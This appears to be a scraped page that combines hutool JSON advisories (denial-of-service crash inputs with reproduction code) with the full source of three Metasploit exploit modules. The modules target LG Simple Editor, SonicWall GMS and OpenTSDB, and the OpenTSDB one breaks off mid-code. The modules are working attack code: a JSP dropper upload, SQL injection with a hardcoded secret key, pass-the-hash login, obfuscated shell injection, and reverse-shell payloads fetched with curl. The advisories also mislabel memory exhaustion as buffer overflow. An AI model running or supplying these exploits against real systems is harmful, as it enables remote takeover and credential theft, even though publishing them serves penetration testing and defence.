hutool v5.8.21 was discovered to contain a buffer overflow via the component `JSONUtil.parse()`.

**hutool Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Sep 9, 2023 to the GitHub Advisory Database • Updated Sep 11, 2023

GHSA-rr66-qh5m-w6mx: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonObject.putByPath`.

GHSA-7p8c-crfr-q93p: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.

GHSA-rxgf-r843-g53h: hutool Buffer Overflow vulnerability

hutool v5.8.21 was discovered to contain a buffer overflow via the component JSONUtil.parse().

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONUtil;

public class JSONOUtilTest {

    public static void main(String\[\] args) {
       String s = "{\\"G\\":00,\[,,\[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697\],\]}";
        new JSONOUtilTest().testHutoolJSON(s);
        new JSONOUtilTest().testGson(s);
    }

       // hutool-json测试
        public void testHutoolJSON (String str) {
            JSON json = JSONUtil.parse(str);
        }

        // gson测试
        public void testGson (String str) {
            Gson gson = new GsonBuilder().setPrettyPrinting().create();
            JSONObject entries = gson.fromJson(str, JSONObject.class);
            System.out.println(entries.toStringPretty());
        }
}

2.  堆栈信息

我们的服务使用了hutool-json来将字符串解析为json，当我们接收到的字符串为"{\"G\":00,[,,[0E5,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E9,6E5,true,6E5,6E9,6E5,6E9,6956,EE,5E9,6E5,RE,6E9,6E9,6E5,6E9,6E5,6E9,6E5,6E9,6E5,6E962756779,4141697],]}"时，JSONUtil.parse()挂起一段时间，然后服务崩溃，报错：

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3332)
    	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
    	at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:649)
    	at java.lang.StringBuffer.append(StringBuffer.java:387)
    	at java.io.StringWriter.write(StringWriter.java:77)
    	at cn.hutool.json.serialize.JSONWriter.writeRaw(JSONWriter.java:392)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:231)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.serialize.JSONWriter.writeObjValue(JSONWriter.java:257)
    	at cn.hutool.json.serialize.JSONWriter.writeValueDirect(JSONWriter.java:239)
    	at cn.hutool.json.serialize.JSONWriter.writeField(JSONWriter.java:196)
    	at cn.hutool.json.JSONArray.lambda$write$2cc9e97d$1(JSONArray.java:561)
    	at cn.hutool.json.JSONArray$$Lambda$6/379110473.accept(Unknown Source)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2690)
    	at cn.hutool.core.collection.CollUtil.forEach(CollUtil.java:2674)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:561)
    	at cn.hutool.json.JSONArray.write(JSONArray.java:543)
    	at cn.hutool.json.JSON.toJSONString(JSON.java:120)
    	at cn.hutool.json.JSONArray.toString(JSONArray.java:522)
    	at cn.hutool.json.JSONParser.parseTo(JSONParser.java:69)
    	at cn.hutool.json.ObjectMapper.mapFromTokener(ObjectMapper.java:243)
    	at cn.hutool.json.ObjectMapper.mapFromStr(ObjectMapper.java:219)
    	at cn.hutool.json.ObjectMapper.map(ObjectMapper.java:98)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:210)
    	at cn.hutool.json.JSONObject.<init>(JSONObject.java:187)
    	at cn.hutool.json.JSONUtil.parseObj(JSONUtil.java:112)
    	at cn.hutool.json.JSONUtil.parse(JSONUtil.java:227)
    

经测试，我们发现，如果使用gson解析上述字符串，gson能够捕获异常：

    Exception in thread "main" com.google.gson.JsonSyntaxException: duplicate key: G
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:190)
    	at com.google.gson.internal.bind.MapTypeAdapterFactory$Adapter.read(MapTypeAdapterFactory.java:145)
    	at com.google.gson.Gson.fromJson(Gson.java:932)
    	at com.google.gson.Gson.fromJson(Gson.java:897)
    	at com.google.gson.Gson.fromJson(Gson.java:846)
    	at com.google.gson.Gson.fromJson(Gson.java:817)
    	at JSONOUtilTest.testGson(JSONOUtilTest.java:43)
    	at JSONOUtilTest.main(JSONOUtilTest.java:54)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

通过与gson运行结果的对比，JSONUtil.parse()方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患。

CVE-2023-42278: `JSONUtil.parse()`方法解析特定输入时，会导致服务挂起和崩溃，存在安全隐患 · Issue #3289 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonObject.putByPath.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Comments**

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONObject jSONObject = new JSONObject();
        Object value = new Object();
        jSONObject.putByPath("...z.888888888", value);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:435)
    	at cn.hutool.core.collection.ListUtil.setOrPadding(ListUtil.java:414)
    	at cn.hutool.core.bean.BeanUtil.setFieldValue(BeanUtil.java:312)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:150)
    	at cn.hutool.core.bean.BeanPath.set(BeanPath.java:115)
    	at cn.hutool.json.JSONObject.putByPath(JSONObject.java:325)
    	at JSONObjectTest.main(JSONObjectTest.java:39)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。

2 participants

CVE-2023-42277: `putByPath()`方法抛出OutOfMemory异常 · Issue #3285 · dromara/hutool

hutool v5.8.21 was discovered to contain a buffer overflow via the component jsonArray.

**版本情况**

JDK版本： 1.8.0\_362  
hutool版本： 5.8.21

**问题描述（包括截图）**

1.  复现代码

import cn.hutool.json.JSONObject;

public class JSONObjectTest {

    public static void main(String\[\] args) {
        JSONArray jSONArray = new JSONArray();
        Object element = new Object();
        jSONArray.add(1247626122, element);
    }
}

2.  堆栈信息

    Exception in thread "main" java.lang.OutOfMemoryError: Java heap space
    	at java.util.Arrays.copyOf(Arrays.java:3210)
    	at java.util.Arrays.copyOf(Arrays.java:3181)
    	at java.util.ArrayList.grow(ArrayList.java:267)
    	at java.util.ArrayList.ensureExplicitCapacity(ArrayList.java:241)
    	at java.util.ArrayList.ensureCapacityInternal(ArrayList.java:233)
    	at java.util.ArrayList.add(ArrayList.java:464)
    	at cn.hutool.json.JSONArray.addRaw(JSONArray.java:594)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:352)
    	at cn.hutool.json.JSONArray.add(JSONArray.java:461)
    	at JSONArrayFuzzerTest19.main(JSONArrayFuzzerTest19.java:37)
    

3.  测试涉及到的文件（注意脱密）  
    见复现代码。
    
4.  分析
    

jsonArray.add(idx, [element)会在指定索引idx添加一个元素element。如果jsonArray长度小于指定索引，jsonArray.add()就会通过循环不断添加null，直到jsonArray的长度等于指定索引值。如果这个索引特别大，比如1247626122，就会报告一个OOM异常。

CVE-2023-42276: `JSONArray`的`add()`方法抛出OutOfMemory异常 · Issue #3286 · dromara/hutool

This Metasploit module exploits broken access control and directory traversal vulnerabilities in LG Simple Editor software for gaining code execution. The vulnerabilities exist in versions of LG Simple Editor prior to v3.21. By exploiting this flaw, an attacker can upload and execute a malicious JSP payload with the SYSTEM user permissions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper # includes register_files_for_cleanup  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'LG Simple Editor Remote Code Execution',        'Description' => %q{          This Metasploit module exploits broken access control and directory traversal          vulnerabilities in LG Simple Editor software for gaining code execution.          The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.          By exploiting this flaw, an attacker can upload and execute a malicious JSP          payload with the SYSTEM user permissions.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'Ege Balcı <egebalci@pm.me>' # msf module        ],        'References' => [          ['ZDI', '23-1204'],          ['CVE', '2023-40498']        ],        'DefaultOptions' => {          'WfsDelay' => 5        },        'Platform' => %w[win],        'Arch' => [ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          ['LG Simple Editor <= v3.21', {}]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-08-24',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [true, 'The URI of the LG Simple Editor', '/'])      ]    )  end  def check    res = send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri, 'simpleeditor', 'common', 'commonReleaseNotes.do')      }    )    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?    version = Rex::Version.new(res.get_html_document.xpath('//h2')[0]&.text&.gsub('v', ''))    return Exploit::CheckCode::Unknown if version.nil? || version == 'Unknown'    return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('3.21.0')    Exploit::CheckCode::Safe  end  def generate_jsp_payload    exe = generate_payload_exe    base64_exe = Rex::Text.encode_base64(exe)    payload_name = rand_text_alpha(rand(3..8))    var_raw = 'a' + rand_text_alpha(rand(3..10))    var_ostream = 'b' + rand_text_alpha(rand(3..10))    var_buf = 'c' + rand_text_alpha(rand(3..10))    var_decoder = 'd' + rand_text_alpha(rand(3..10))    var_tmp = 'e' + rand_text_alpha(rand(3..10))    var_path = 'f' + rand_text_alpha(rand(3..10))    var_proc2 = 'e' + rand_text_alpha(rand(3..10))    jsp = %|    <%@page import="java.io.*" %>    <%@page import="sun.misc.BASE64Decoder"%>    <%    try {      String #{var_buf} = "#{base64_exe}";      BASE64Decoder #{var_decoder} = new BASE64Decoder();      byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");      String #{var_path} = #{var_tmp}.getAbsolutePath();      BufferedOutputStream #{var_ostream} =        new BufferedOutputStream(new FileOutputStream(#{var_path}));      #{var_ostream}.write(#{var_raw});      #{var_ostream}.close();      Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});    } catch (Exception e) {    }    %>    |    jsp.gsub!(/[\n\t\r]/, '')    jsp  end  def copy_file(src, dst)    data = {      command: 'cp',      option: '-f',      srcPath: src,      destPath: dst    }    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'fileSystem',                               'makeDetailContent.do'),        'headers' => {          'X-Requested-With' => 'XMLHttpRequest',          'Accept' => 'application/json'        },        'ctype' => 'application/json',        'data' => data.to_json      }    )    if res && res.code == 200 && res.body.to_s.include?('errorMessage":"success",')      print_good "#{src} -> #{dst} copy successfull."    else      fail_with(Failure::UnexpectedReply, "#{peer} - Could not copy the payload.")    end  end  def exploit    rand_name = Rex::Text.rand_text_alpha(5)    form = Rex::MIME::Message.new    form.add_part(      generate_jsp_payload,      'image/bmp',      'binary',      "form-data; name=\"uploadFile\"; filename=\"#{rand_name}.bmp\""    )    form.add_part('/', nil, nil, 'form-data; name="uploadPath"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_x"')    form.add_part('-1000', nil, nil, 'form-data; name="uploadFile_y"')    form.add_part('1920', nil, nil, 'form-data; name="uploadFile_width"')    form.add_part('1080', nil, nil, 'form-data; name="uploadFile_height"')    print_status 'Uploading JSP payload...'    res = send_request_cgi(      {        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', 'imageManager', 'uploadImage.do'),        'ctype' => "multipart/form-data; boundary=#{form.bound}",        'data' => form.to_s      }    )    if res && res.code == 200      print_good 'Payload uploaded successfully'    else      fail_with(Failure::UnexpectedReply, "#{peer} - Payload upload failed")    end    # Now we copy our payload as JSP    copy_file("/#{rand_name}_original.bmp", "/#{rand_name}.jsp")    register_files_for_cleanup("./webapps/simpleeditor/#{rand_name}.jsp")    print_status 'Triggering payload...'    send_request_cgi(      {        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, 'simpleeditor', "#{rand_name}.jsp")      }    )  endend

LG Simple Editor Remote Code Execution

This Metasploit module exploits a series of vulnerabilities - including auth bypass, SQL injection, and shell injection - to obtain remote code execution on SonicWall GMS versions 9.9.9320 and below.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html  # We can actually use the title to identify which platform we're on  TITLE_WINDOWS = 'SonicWall Universal Management Host'  TITLE_LINUX = 'SonicWall Universal Management Appliance'  # Secret key (from com.sonicwall.ws.servlet.auth.MSWAuthenticator)  SECRET_KEY = '?~!@#$%^^()'  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sonicwall',        'Description' => %q{          This module exploits a series of vulnerabilities - including auth          bypass, SQL injection, and shell injection - to obtain remote code          execution on SonicWall GMS versions <= 9.9.9320.        },        'License' => MSF_LICENSE,        'Author' => [          'fulmetalpackets <fulmetalpackets@gmail.com>', # MSF module, analysis          'Ron Bowes <rbowes@rapid7.com>' # MSF module, original PoC, analysis        ],        'References' => [          [ 'URL', 'https://www.rapid7.com/blog/post/2023/07/13/etr-sonicwall-recommends-urgent-patching-for-gms-and-analytics-cves/'],          [ 'CVE', '2023-34124'],          [ 'CVE', '2023-34133'],          [ 'CVE', '2023-34132'],          [ 'CVE', '2023-34127']        ],        'Privileged' => true,        'Targets' => [          [            'Linux Dropper',            {              'Platform' => ['linux'],              'Arch' => [ARCH_X64],              'Type' => :dropper,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'WritableDir' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['win'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp',                'WritableDir' => '%TEMP%'              }            }          ],          [            'Linux Command',            {              'Platform' => ['linux', 'unix'],              'Arch' => [ARCH_CMD],              'Type' => :cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/generic'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-12',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'SSL' => true,          'RPORT' => '443'        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The root URI of the Sonicwall appliance', '/']),      ]    )    register_advanced_options([      # This varies by target, so don't define the default here      OptString.new('WritableDir', [true, 'A directory where we can write files']),    ])  end  def check    vprint_status("Validating SonicWall GMS is running on URI: #{target_uri.path}")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path),      'method' => 'GET'    )    # Basic sanity checks - the path should return a HTTP/200    return CheckCode::Unknown('Could not connect to web service - no response') if res.nil?    return CheckCode::Unknown("Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200    # Ensure we're hitting plausible software    return CheckCode::Detected("Running: #{::Regexp.last_match(1)}") if res.body =~ /(SonicWall Universal Management Suite [^<]+)</    # Otherwise, probably safe?    CheckCode::Safe('Does not appear to be running SonicWall GMS')  end  # Exploits CVE-2023-34133 (SQL injection) + CVE-2023-34124 (auth bypass) to  # get a password hash  def get_password_hash    # attempt a sqli.    vprint_status('Attempting to use SQL injection to grab the password hash for the superadmin user...')    # SQL injection question to fetch the admin password    query = "' union select " +            # This must be a valid DOMAIN, which we can thankfully fetch from the DB            '(select ID from SGMSDB.DOMAINS limit 1), ' +            # These fields don't matter            "'', '', '', '', '', " +            # This field is returned, so use it to get the id and password for our            # the super user, if possible            "(select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0)," +            # The rest of the fields don't matter, end with a single quote to finish with a clean query            "'', '', '"    vprint_status("Generated SQL injection: #{query}")    # We need to sign our query with the SECRET_KEY    token = Base64.strict_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.const_get('SHA1').new, SECRET_KEY, query))    vprint_status("Generated a token using built-in secret key: #{token}")    # Build the URI    # Note that encoding space to '+' doesn't work, so we replace it with '%20'    uri = normalize_uri(target_uri.path, 'ws/msw/tenant', CGI.escape(query).gsub(/\+/, '%20'))    # Do it!    print_status('Sending SQL injection request to get the username/hash...')    res = send_request_cgi(      'method' => 'GET',      'uri' => uri,      'headers' => {        'Auth' => '{"user": "system", "hash": "' + token + '"}'      }    )    # Sanity checks    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code: #{res.code}") if res.code != 200    fail_with(Failure::UnexpectedReply, "Service didn't return a JSON response") if res.get_json_document.empty?    # This field has the SQL injection response    hash = res.get_json_document['alias']    # If the server responds with an error, it has no 'alias' field so the key    # is missing entirely (this is where it fails against patched targets)    fail_with(Failure::NotVulnerable, "SQL injection failed - service probably isn't vulnerable (or isn't configured)") if hash.nil?    # If alias is present but contains nothing, that means our query got no    # results (probably there are no active users, or something?)    fail_with(Failure::UnexpectedReply, 'SQL injection appeared to work, but no users returned - server might not have an admin account?') if hash.empty?    # If there's no ':' in the response, something super weird happened    fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')    username, hash = hash.split(/:/, 2)    print_good("Found an account: #{username}:#{hash}")    [username, hash]  end  # Exploits CVE-2023-34132 (pass the hash)  def authenticate(username, hash)    # Grab server hashing token    vprint_status('Grabbing server hashing token...')    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/appliance/login'),      'keep_cookies' => true    )    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Look for the getPwdHash function call, as it contains the token we need    if res.body.match(/getPwdHash.*,'([0-9]+)'/).nil?      fail_with(Failure::UnexpectedReply, 'Could not get the server token for authentication')    end    server_token = ::Regexp.last_match(1)    vprint_status("Got the server-side token: #{server_token}")    # Generate the client_hash by combining the server token + the stolen    # password hash    client_hash = Digest::MD5.hexdigest(server_token + hash)    vprint_status("Generated client token: #{client_hash}")    # Send the token    print_status('Attempting to authenticate with the client token + password hash...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'login',        'clientHash' => client_hash,        'applianceUser' => username      }    })    fail_with(Failure::Unreachable, 'Could not connect to web service - no response') if res.nil?    # Check the title to make sure it worked    html = res.get_html_document    title = html.at('title').text    # We can identify the platform based on the title    if title == TITLE_LINUX      print_good("Successfully logged in as #{username} (Linux detected!)")      return Msf::Module::Platform::Linux    elsif title == TITLE_WINDOWS      print_good("Successfully logged in as #{username} (Windows detected!)")      return Msf::Module::Platform::Windows    end    fail_with(Failure::UnexpectedReply, "Authentication appears to have failed! Title was \"#{title}\", which is not recognized as successful")  end  def execute_command_windows(cmd)    vprint_status("Encoding (Windows) command: #{cmd}")    # While this is a shell command injection issue, an aggressive XSS filter    # prevents us from using a lot of important characters such as quotes and    # plus and ampersands and stuff. We can't even use Base64, because we can't    # use the + sign!    #    # We discovered that we could encode the command as integers, then use    # powershell to decode + execute it, so that's what this does.    cmd = "cmd.exe /c #{Msf::Post::Windows.escape_powershell_literal(cmd).gsub(/&/, '"&"')}"    encoded_cmd = "powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(#{cmd.bytes.join(',')})))"    # Run the command    vprint_status("Running shell command: #{cmd}")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => 'C:\\GMSVP\\etc\\',        'searchFilter' => "|#{encoded_cmd}| rem "      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def execute_command_linux(cmd)    vprint_status('Encoding (Linux) payload')    # Generate a filename    payload_file = File.join(datastore['WritableDir'], ".#{Rex::Text.rand_text_alpha_lower(8)}")    # Wrap the command so we can execute arbitrary commands. There are several    # difficulties here, the first of which is that we don't have much in the    # way of tools. We're missing curl, wget, base64, python, ruby, even perl!    # The best tool I could find for staging a payload is uudecode, so we use    # that. (I noticed later that telnet exists, which could be another option)    #    # The good news is, with uudecode, we can send a base64 payload. The bad    # news is, we can't use '+', which means we can't use pure base64! To work    # around that, we replace '+' with '@', then use a bit of Bash magic to    # put it back! We also can't use quotes, so we have to do a mountain of    # escaping instead. The default shell is also /bin/sh, so we need to run    # bash explicitly for the `$()` substitutions to work.    cmd = [      # Build a command that runs in bash (but don't use quotes!)      'bash -c ',      # Escape all this for bash      Shellwords.escape([        # Use `uudecode` to get a '+' into a variable        "PLUS=$(echo -e begin-base64\ 755\ a\\\\nKwee\\\\n==== | uudecode -o-);",        # Build a new uuencode file (encoded in base64) with the payload        "echo -e begin-base64 755 #{Shellwords.escape(payload_file)}\\\\n",        # Encode the payload as base64, but replace + with a variable        "#{Base64.strict_encode64(cmd).gsub(/\+/, '${PLUS}')}\\\\n",        # Pipe into uudecode        '==== | uudecode;',        # Run in the background with coproc        "coproc #{Shellwords.escape(payload_file)};",        # Delete the payload file        "rm #{payload_file}"      ].join)    ].join    # Run it!    vprint_status("Encoded shell command: #{cmd}")    print_status('Attempting to execute the shell injection payload')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/appliance/applianceMainPage'),      'keep_cookies' => true,      'vars_post' => {        'action' => 'file_system',        'task' => 'search',        'searchFolder' => '/opt/GMSVP/etc/',        'searchFilter' => ";#{cmd}#"      }    })    # This doesn't work, because our payload blocks and it eventually fails    fail_with(Failure::Unreachable, 'No response to command execution') if res.nil? || res.body.empty?    fail_with(Failure::UnexpectedReply, 'The server rejected our command due to filtering (the service has very aggressive XSS filtering, which blocks a lot of shell commands)') if res.body.include?('invalid contents found')    print_good('Payload sent!')  end  def exploit    # Get the password hash (from SQL injection + auth bypass)    username, hash = get_password_hash    # Use pass-the-hash to log in using that hash    detected_platform = authenticate(username, hash)    # Sanity-check the target    if !datastore['ForceExploit'] && !target.platform.platforms.include?(detected_platform)      fail_with(Failure::BadConfig, "The host appears to be #{detected_platform}, which the target #{target.name} does not support; please choose the appropriate target (or set ForceExploit to true)")    end    # Generate a payload based on the target type    case target['Type']    when :cmd      my_payload = payload.encoded    when :dropper      my_payload = generate_payload_exe    else      fail_with(Failure::BadConfig, "Unknown target type: #{target.type}")    end    # Run a command, using the platform specified in the target    if target.platform.platforms.include?(Msf::Module::Platform::Linux)      execute_command_linux(my_payload)    elsif target.platform.platforms.include?(Msf::Module::Platform::Windows)      execute_command_windows(my_payload)    else      fail_with(Failure::Unknown, "Unknown platform: #{platform}")    end  endend

Sonicwall GMS 9.9.9320 Remote Code Execution

This Metasploit module exploits an unauthenticated command injection vulnerability in the key parameter in OpenTSDB through 2.4.1 in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.1 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the key parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.4.1.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenTSDB 2.4.1 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in the key parameter in OpenTSDB through          2.4.1 (CVE-2023-36812/CVE-2023-25826) in order to achieve          unauthenticated remote code execution as the root user.          The module first attempts to obtain the OpenTSDB version via          the api. If the version is 2.4.1 or lower, the module          performs additional checks to obtain the configured metrics          and aggregators. It then randomly selects one metric and one          aggregator and uses those to instruct the target server to          plot a graph. As part of this request, the key parameter is          set to the payload, which will then be executed by the target          if the latter is vulnerable.          This module has been successfully tested against OpenTSDB          version 2.4.1.        },        'License' => MSF_LICENSE,        'Author' => [          'Gal Goldstein', # discovery          'Daniel Abeles', # discovery          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['URL', 'https://github.com/OpenTSDB/opentsdb/security/advisories/GHSA-76f7-9v52-v2fw'], # security advisory          ['CVE', '2023-36812'], # CVE linked in the official security advisory          ['CVE', '2023-25826'] # CVE that seems to be a dupe of CVE-2023-36812 since it describes the same issue and references the PR that introduces the commits that are referenced in CVE-2023-36812        ],        'Platform' => 'linux',        'Arch' => 'ARCH_CMD',        'DefaultOptions' => {          'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',          'RPORT' => 4242,          'SRVPORT' => 8080,          'FETCH_COMMAND' => 'CURL',          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),          'FETCH_WRITABLE_DIR' => '/tmp',          'FETCH_SRVPORT' => 8081        },        'Targets' => [ [ 'Linux', {} ] ],        'DefaultTarget' => 0,        'Privileged' => true,        'DisclosureDate' => '2023-07-01',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),    ]  end  def check    # sanity check to see if the target is likely OpenTSDB    res1 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res1      return CheckCode::Unknown('Connection failed.')    end    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')      return CheckCode::Safe('Target is not an OpenTSDB application.')    end    # get the version via the api    res2 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api', 'version')    })    unless res2      return CheckCode::Unknown('Connection failed.')    end    unless res2.code == 200 && res2.body.include?('version')      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')    end    begin      parsed_res_body = JSON.parse(res2.body)    rescue JSON::ParserError      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    version = parsed_res_body['version']    begin      if Rex::Version.new(version) <= Rex::Version.new('2.4.1')        return CheckCode::Appears("The target is OpenTSDB version #{version}")      else        return CheckCode::Safe("The target is OpenTSDB version #{version}")      end    rescue ArgumentError => e      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")    end  end  def select_metric    # check if any metrics have been configured. if not, exploitation cannot work    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'suggest'),      'vars_get' => { 'type' => 'metrics' }    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")    end    begin      metrics = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')    end    unless metrics.is_a?(Array)      fail_with(Failure::UnexpectedReply, 